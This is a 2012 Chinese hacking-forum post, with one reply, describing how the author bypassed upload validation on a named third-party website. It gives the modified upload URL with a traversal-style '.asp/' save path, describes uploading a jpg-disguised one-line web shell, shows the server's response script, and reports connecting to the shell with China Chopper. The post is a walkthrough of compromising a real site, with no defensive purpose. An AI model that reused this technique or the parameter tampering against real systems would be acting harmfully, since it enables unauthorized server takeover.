中国网络渗透测试联盟
标题:
原创 修改元素突破本地上传验证
[打印本页]
作者:
admin
时间:
2012-9-5 14:22
标题:
原创 修改元素突破本地上传验证
首先感谢z-hero的技术指导,
http://www.political-security.com[url=http://
www.political-security.com
/]/
[/url],先注册个账号,在建立馆那里有个上传,上传地址是
http://www.political-security.co ... wPath=upload/2012-9
,我们来修改一下修改为http:是//www.political-security.com/user/zl_up.asp?fromForm=myform&fromEdit=user1photo&saveTo=../upload/2012-9/1.asp/&showPath=upload/2012-9/1.asp,
* m7 c8 |7 \- P, {: t! W5 W5 U9 D
大家看效果[attach]34[/attach],点上传,上传格式为jpg的一句话,因为我试了,大马不通过,[attach]35[/attach],然后确定点否,查看源代码,
script
>
window.opener.document.myform.user1photo.value=
'upload/2012-9/1.asp/2012090514191858534.jpg'
;
</
script
>
<
script
>
window.alert(
'文件上传成功!'
);window.close();
</
script
>
]; Z8 ]& A5 @8 e: W. U
菜刀链接,[attach]36[/attach]成功,嘿嘿
作者:
netlost
时间:
2012-9-16 14:44
跟另外一篇文章有相似之处,但是手法不一样,有的上传点限制条件也不一样,看情况而定的。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2